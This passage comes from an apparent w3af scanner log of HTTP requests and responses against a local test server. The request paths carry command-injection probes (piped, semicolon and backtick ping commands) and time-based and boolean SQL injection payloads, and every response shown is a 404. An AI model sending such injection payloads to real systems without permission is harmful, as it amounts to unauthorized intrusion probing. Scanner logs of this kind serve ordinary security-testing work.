                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="847">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/%7Cping+-n+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="847">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="852">
                <httprequest>
                    <status>POST http://192.168.0.116:31337/qmwen%3C%2F-%3Eqmwen%2F%2Aqmwen%22qmwenqmwen%27qmwenqmwen%60qmwenqmwen+%3D HTTP/1.1</status>
                    <headers>
                        <header content="31" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWVzc2FnZT1IZWxsbyUyMFdvcmxkJnBzZXVkbz01Ng==
</body>
                </httprequest>
                <httpresponse id="852">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="855">
                <httprequest>
                    <status>POST http://192.168.0.116:31337/79+AND+79%3D80+ HTTP/1.1</status>
                    <headers>
                        <header content="31" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWVzc2FnZT1IZWxsbyUyMFdvcmxkJnBzZXVkbz01Ng==
</body>
                </httprequest>
                <httpresponse id="855">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="863">
                <httprequest>
                    <status>POST http://192.168.0.116:31337/YFCzCZoJ HTTP/1.1</status>
                    <headers>
                        <header content="31" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWVzc2FnZT1IZWxsbyUyMFdvcmxkJnBzZXVkbz01Ng==
</body>
                </httprequest>
                <httpresponse id="863">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="868">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/1%27%29%3Bwaitfor+delay+%270%3A0%3A3%27-- HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="868">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="882">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/%7Cping+-c+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="882">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="900">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/1%27%29%29%3Bwaitfor+delay+%270%3A0%3A3%27-- HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="900">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="913">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/%7C%2Fusr%2Fsbin%2Fping+-s+localhost+4 HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="913">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="929">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/1+or+SLEEP%283%29 HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="929">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="936">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/%3Bping+-n+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="936">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="945">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/1%27+or+SLEEP%283%29+and+%271%27%3D%271 HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="945">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="952">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/%3Bping+-c+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="952">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="961">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/1%22+or+SLEEP%283%29+and+%221%22%3D%221 HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="961">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="968">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/%3B%2Fusr%2Fsbin%2Fping+-s+localhost+4 HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="968">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="977">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/1+or+pg_sleep%283%29 HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="977">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="984">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/%60ping+-n+4+localhost%60 HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="984">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="993">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/1%27+or+pg_sleep%283%29+and+%271%27%3D%271 HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="993">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="1000">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/%60ping+-c+4+localhost%60 HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="1000">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="1009">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/1%22+or+pg_sleep%283%29+and+%221%22%3D%221 HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="1009">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="1015">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/run+ping+-n+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="1015">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
